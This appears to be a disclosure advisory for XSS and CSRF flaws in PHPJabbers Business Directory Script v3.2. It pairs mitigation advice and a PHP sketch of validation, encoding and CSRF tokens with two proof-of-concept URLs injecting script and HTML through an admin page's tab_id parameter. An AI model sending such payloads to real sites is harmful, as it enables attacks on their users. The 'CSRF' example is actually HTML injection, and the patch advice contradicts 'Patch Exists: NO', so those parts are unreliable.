Vendor: Business Directory Script
By: Kerimcan Ozturk
CVSS: 5.5 (MEDIUM)
CWE: Cross-Site Scripting (XSS), Cross-Site Request Forgery
Product Name: Business Directory Script
Affected Version From: 3.2
Affected Version To: 3.2
Patch Exists: NO
Platforms Tested: Windows 10 Pro
2023

PHPJabbers Business Directory Script v3.2 – Multiple Vulnerabilities

The PHPJabbers Business Directory Script v3.2 is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. An attacker can exploit these vulnerabilities to perform malicious actions or steal sensitive information.

Mitigation:

To mitigate these vulnerabilities, it is recommended to apply the latest patch or update provided by the vendor. Additionally, input validation and output encoding should be implemented to prevent XSS attacks. CSRF tokens should also be used to protect against CSRF attacks.
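
The three mitigations named above, sketched for the `tab_id` parameter that appears in the requests on this page. This is an added example, not PHPJabbers code: the helper names, the allow-list pattern for `tab_id`, the session key and the `csrf_token` form field are assumptions.

```php
<?php
declare(strict_types=1);
// Added illustration: hypothetical helpers, not PHPJabbers code.

// Input validation: accept tab_id only if it matches an allow-list pattern.
// Assumption: legitimate tab ids are short alphanumeric tokens.
function valid_tab_id($raw, string $default = ''): string
{
    $ok = is_string($raw) && preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $raw) === 1;
    return $ok ? $raw : $default;
}

// Output encoding for HTML text and quoted attribute values.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Issue (or reuse) a random per-session CSRF token.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time check of the submitted token against the session token.
function csrf_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

// Hypothetical update handler: reject any POST that lacks a valid token.
session_start();
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST'
    && !csrf_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid CSRF token');
}
$tabId = valid_tab_id($_GET['tab_id'] ?? null); // non-matching input falls back to ''
?>
<form method="post">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <input type="hidden" name="tab_id" value="<?= h($tabId) ?>">
</form>
```

Validation and encoding are applied together on purpose: the allow-list rejects unexpected `tab_id` values at input, and `h()` still encodes whatever reaches the template, so a gap in one layer does not put markup into the page.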

Exploit-DB raw data:

# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
# Date: 09/08/2023
# Exploit Author: Kerimcan Ozturk
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/business-directory-script/
# Version: 3.2
# Tested on: Windows 10 Pro
## Description

Technical Detail / POC
==========================
Login Account
Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57)

[1] Cross-Site Scripting (XSS)

Request:
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id="<script><image/src/onerror=prompt(8)>

[2] Cross-Site Request Forgery

Request:
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id="<script><font%20color="green">Kerimcan%20Ozturk</font>

Best Regards